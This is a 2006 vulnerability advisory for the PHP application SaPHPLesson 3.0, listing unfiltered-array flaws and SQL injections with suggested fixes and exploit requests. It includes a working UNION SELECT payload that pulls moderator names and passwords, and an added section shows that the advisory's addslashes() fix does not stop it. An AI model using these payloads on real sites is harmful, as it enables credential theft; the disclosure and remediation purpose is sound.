Topic : SaPHPLesson 3.0 Multbugs
SecurityAlert : 862
CVE : CVE-2006-2279 CVE : CVE-2006-2278
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : o y 6 hotmail com
Published : 10.05.2006
Affected Software : SaPHPLesson 3.0
Advisory Content :
SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:
1- Unfiltered array
Filename :- show.php
Line :- 102
[code]
$hrow[] = $Row2;[/code]
Fix :-
Add this code at line [ 11 ] of /show.php :-
We add the code at global scope to fix all the unfiltered variables in the code :)
[code]
$hrow = array();[/code]
Exploit :-
GET ^
/lessons/show.php?lessid=1&hrow=D3vil-0x1
/---------------------------------------------------------/
2- Unfiltered array
Filename :- showcat.php
Line :- 80
[code]
$Lsnrow[] = $Row;[/code]
Fix :-
Add this code at line [ 11 ] of /showcat.php :-
We add the code at global scope to fix all the unfiltered variables in the code :)
[code]
$Lsnrow = array();[/code]
Exploit :-
GET ^
/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1
/---------------------------------------------------------/
3- SQL Injection
Filename :- search.php
Line :- Multiple lines
Fix :-
Replace line 28 with
[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY
less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order
by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]
Replace line 32 with
[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY
less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and
forums.id=less.forumno order by ".addslashes($Order)."
".addslashes($Trteb)."";[/code]
Exploit :-
POST ^
Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC
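The `addslashes()` calls in the fix above only escape quotes, backslashes and NUL bytes, so they do not constrain values used as column names or sort direction, where the request above contains no quote at all. An added example, not part of the advisory or of SaPHPLesson, that instead allow-lists `Find`, `Order` and `Trteb` and binds `Word` and `Cat` as parameters; the allow-list contents, the `pick()` and `build_search()` names and the treatment of `Cat=All` as "no filter" are assumptions.

```php
<?php
// Added example, not SaPHPLesson code. The allow-list contents are assumptions
// built from names visible in the advisory (lesstitle, lessid, DESC).
const FIND_COLUMNS  = ['lesstitle'];
const ORDER_COLUMNS = ['lessid', 'lesstitle'];
const DIRECTIONS    = ['ASC', 'DESC'];

// Return $value only if it is an exact member of the allow-list.
function pick(string $value, array $allowed, string $field): string
{
    if (!in_array($value, $allowed, true)) {
        throw new InvalidArgumentException("rejected $field");
    }
    return $value;
}

// Identifiers and sort direction come from allow-lists; the data values
// (Word, Cat) are bound as parameters instead of being concatenated.
function build_search(array $in): array
{
    $find  = pick((string) ($in['Find'] ?? ''), FIND_COLUMNS, 'Find');
    $order = pick((string) ($in['Order'] ?? ''), ORDER_COLUMNS, 'Order');
    $dir   = pick(strtoupper((string) ($in['Trteb'] ?? '')), DIRECTIONS, 'Trteb');

    $sql = "SELECT * FROM less, forums WHERE less.Hidden != 1"
         . " AND BINARY less.$find REGEXP :word"
         . " AND forums.id = less.forumno";
    $params = [':word' => (string) ($in['Word'] ?? '')];
    // Assumption: Cat=All means "no category filter".
    if (($in['Cat'] ?? 'All') !== 'All') {
        $sql .= " AND less.forumno = :cat";
        $params[':cat'] = (int) $in['Cat'];
    }
    return ["$sql ORDER BY $order $dir", $params];
}

// Constructed inputs: a normal search and a quote-free injected Find value.
$good = ['Word' => 'a', 'Find' => 'lesstitle', 'Cat' => 'All', 'Order' => 'lessid', 'Trteb' => 'DESC'];
$bad  = ['Find' => 'lesstitle UNION ALL SELECT 1 FROM modretor'] + $good;

// Compare the injected value before and after addslashes().
var_dump(addslashes($bad['Find']) === $bad['Find']);

[$sql, $params] = build_search($good);
echo $sql, PHP_EOL; // pass to PDO: $pdo->prepare($sql)->execute($params)
try {
    build_search($bad);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```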
/---------------------------------------------------------/
4- SQL Injection
Filename :- misc.php
Line :- 64
Fix :-
Replace lines 62 & 63 with this code
[code]
$LID = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);[/code]
/---------------------------------------------------------/
5- Unfiltered array
Filename :- index.php
Line :- 24
[code]
$rows[] = $Row;[/code]
Fix :-
Add this code at line [ 11 ] of /index.php :-
We add the code at global scope to fix all the unfiltered variables in the code :)
[code]
$rows = array();
$hrow = array();[/code]
Exploit :-
GET ^
/saphplesson/index.php?rows=D3vil-x01